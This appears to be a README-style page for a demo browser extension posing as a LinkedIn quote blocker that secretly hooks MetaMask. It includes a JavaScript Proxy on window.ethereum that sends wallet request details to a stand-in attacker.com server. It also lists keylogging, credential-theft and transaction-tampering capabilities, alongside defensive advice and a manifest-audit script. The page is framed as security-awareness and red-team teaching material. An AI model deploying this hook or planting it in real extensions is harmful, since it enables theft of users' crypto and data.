La Pecorina: The LinkedIn Quote Blocker That Drains Your Wallet

La Pecorina

Browser Extensions Drain Wallets

You install "LinkedIn Quote Blocker" to avoid hustle culture. 4.8 stars. Great reviews. "Finally no more 'my dog taught me leadership' posts!"

It blocks the quotes. Works perfectly. You trust it.

Three weeks later your MetaMask is empty.

La Pecorina demonstrates how this happens.


The Attack Vector

What users see:

  • Cleaner LinkedIn feed
  • No motivational spam
  • Better browsing experience
  • Free Chrome extension

What actually happens:

  • Blocks quotes (yes, really - has to deliver on promise)
  • Hooks window.ethereum (MetaMask provider)
  • Monitors every wallet transaction
  • Logs to attacker server
  • Waits for the right moment

The extension does what it advertises. That's how you stay installed.


How It Works

Phase 1: Deliver Value

Extension blocks LinkedIn quotes. Users love it. Leave reviews. Recommend to friends.

Trust established.

Phase 2: Request More Permissions

Update notification: "New features! Blocks quotes on all sites now!"

Permissions change: linkedin.com → <all_urls>

User clicks "Allow" without reading. Why wouldn't they? Extension has been great so far.

Phase 3: Hook Web3 Provider

// Intercept MetaMask
const originalProvider = window.ethereum;
window.ethereum = new Proxy(originalProvider, {
  get(target, prop) {
    if (prop === 'request') {
      return async function(args) {
        // Log to attacker
        fetch('https://attacker.com/log', {
          method: 'POST',
          body: JSON.stringify({
            method: args.method,
            params: args.params,
            timestamp: Date.now()
          })
        });
        // Allow transaction (user doesn't notice)
        return target.request(args);
      };
    }
    return target[prop];
  }
});

User approves transactions. Extension logs everything. Patterns analyzed. Wallet drained when it matters most.


What Extensions Can Actually Do

Content scripts access everything:

  • Read entire DOM (passwords in forms)
  • Modify page content (change recipient addresses)
  • Inject keyloggers (capture every keystroke)
  • Hijack clicks (redirect to phishing sites)
  • Steal localStorage (session tokens)

Background scripts persist:

  • Monitor every website you visit
  • Not just LinkedIn - everything
  • Track browsing patterns
  • Exfiltrate continuously
  • Survive browser restarts

Web3 hooking:

  • Detect MetaMask, WalletConnect, Coinbase Wallet
  • Intercept transaction requests
  • Modify parameters mid-flight
  • Front-run trades (MEV extraction)
  • Inject malicious token approvals

All of this from a quote blocker.


Real-World Examples

CryptoRom (2022): Fake crypto trading extensions. 60,000 victims. $87 million stolen. Extensions were in Chrome Web Store.

Nano Adblocker (2020): Legitimate ad blocker with 200,000 users. Sold to malicious actors. Updated to steal data. Users trusted it because it was previously safe.

MEGA Extension Hijack (2018): Official MEGA extension compromised. Uploaded malicious version. Stole Monero wallets and Amazon credentials.

Pattern: Deliver value. Gain trust. Request permissions. Drain wallets.


Technical Demonstrations

La Pecorina shows:

Permission Escalation:

  • Starts with activeTab (innocent)
  • Updates to <all_urls> (malicious)
  • Users barely notice

Provider Hooking:

  • Proxies window.ethereum
  • Intercepts all wallet requests
  • Logs to attacker server
  • Allows transactions (no suspicion)

Data Exfiltration:

  • Credentials from forms
  • Cookies and session tokens
  • Browsing history
  • Wallet addresses
  • Transaction patterns

CSP Bypass:

  • Extensions bypass Content Security Policy
  • Inject inline scripts freely
  • Modify API responses mid-flight
  • Cross-domain localStorage access

Lab Setup

git clone https://github.com/ghostintheprompt/la-pecorina
cd la-pecorina

# Create isolated Chrome profile
# Install test wallet (testnet, empty)
# Load unpacked extension
# Monitor console for demonstration output

DO NOT use in browser with real wallet. Isolated profile only.


Defense

For users:

  1. Audit installed extensions quarterly
  2. Remove unused extensions
  3. Check permissions (why does quote blocker need <all_urls>?)
  4. Separate browsers (crypto in dedicated browser, no other extensions)
  5. Use hardware wallets (Ledger, Trezor isolate keys)

For blue teams:

  • Show La Pecorina to employees who install random Chrome extensions
  • Watch them uninstall 15 extensions immediately
  • Explain that "productivity tools" = attack surface
  • Risk awareness through demonstration
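
One way to make the "check permissions" step repeatable is to audit manifests and compare them across updates. This is an added example, not code from the La Pecorina repository; the function names, the sample manifests and the file name block.js are assumptions made up for illustration.

```javascript
// Added example: static audit of Chrome extension manifests (MV2 and MV3).
// Flags site-wide host access and updates that widen it.
const BROAD = /^(<all_urls>|(\*|https?):\/\/\*\/\*)$/;

// Every origin the extension can touch at install time.
function hostPatterns(manifest) {
  const isPattern = (p) => p === '<all_urls>' || p.includes('://');
  return new Set([
    ...(manifest.permissions || []).filter(isPattern), // MV2 lists hosts here
    ...(manifest.host_permissions || []),              // MV3
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
  ]);
}

function auditManifest(manifest) {
  const findings = [...hostPatterns(manifest)]
    .filter((p) => BROAD.test(p))
    .map((p) => `site-wide host access: ${p}`);
  // Isolated-world content scripts share the DOM but not page JS objects such
  // as window.ethereum; a MAIN-world script does, so it deserves a closer look.
  if ((manifest.content_scripts || []).some((cs) => cs.world === 'MAIN')) {
    findings.push('content script runs in the page (MAIN) world');
  }
  return findings;
}

// Compare the installed manifest with the one an update would bring.
function diffUpdate(oldManifest, newManifest) {
  const before = hostPatterns(oldManifest);
  const added = [...hostPatterns(newManifest)].filter((p) => !before.has(p));
  return { added, escalated: added.some((p) => BROAD.test(p)) };
}

// Constructed sample manifests modelled on the update described in Phase 2.
const v1 = {
  manifest_version: 3, name: 'Quote Blocker', version: '1.0.0',
  permissions: ['activeTab'],
  content_scripts: [{ matches: ['https://www.linkedin.com/*'], js: ['block.js'] }],
};
const v2 = {
  manifest_version: 3, name: 'Quote Blocker', version: '1.1.0',
  permissions: ['activeTab', 'storage'],
  host_permissions: ['<all_urls>'],
  content_scripts: [{ matches: ['<all_urls>'], js: ['block.js'], world: 'MAIN' }],
};

console.log(auditManifest(v1), auditManifest(v2), diffUpdate(v1, v2));
```

Run it with Node against the manifest.json of each unpacked extension in a profile; an update whose diff reports escalated: true is the one to review before anyone clicks "Allow".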

Why This Exists

People install browser extensions without checking permissions.

"LinkedIn quote blocker" with 4.8 stars. What could go wrong?

Everything.

Extensions have full browser access. Can read passwords. Modify transactions. Steal wallet keys. Monitor everything.

La Pecorina demonstrates:

  • How trust gets weaponized
  • How permission escalation works
  • How Web3 providers get hooked
  • How data gets exfiltrated
  • How wallets get drained

For security awareness: Show people who trust random extensions.

For researchers: Study the techniques. Understand extension attack surface.

For attackers: This is why we can't have nice things.


Legal Notice

Educational red team tool. Lab environment only.

Legal uses: Security research. Red team training. Blue team awareness. Bug bounty (with authorization).

Illegal uses: Installing on victim machines. Stealing credentials/crypto. Unauthorized monitoring.

Computer Fraud and Abuse Act is real. Federal prison is real. Don't be stupid.


Ghost Says...

Built this watching people install random Chrome extensions without checking permissions.

Browser extensions = full access to everything you do online.

That "productivity tool" you just installed? Could be logging your MetaMask transactions right now.

La Pecorina shows how. Quote blocker that hooks wallets. Social engineering meets technical exploitation.

Use in lab. Learn the techniques. Stop installing random shit.


github.com/ghostintheprompt/la-pecorina

Malicious browser extension demo. Educational use only. Lab environment required.

Trust nothing. Verify everything. Especially browser extensions.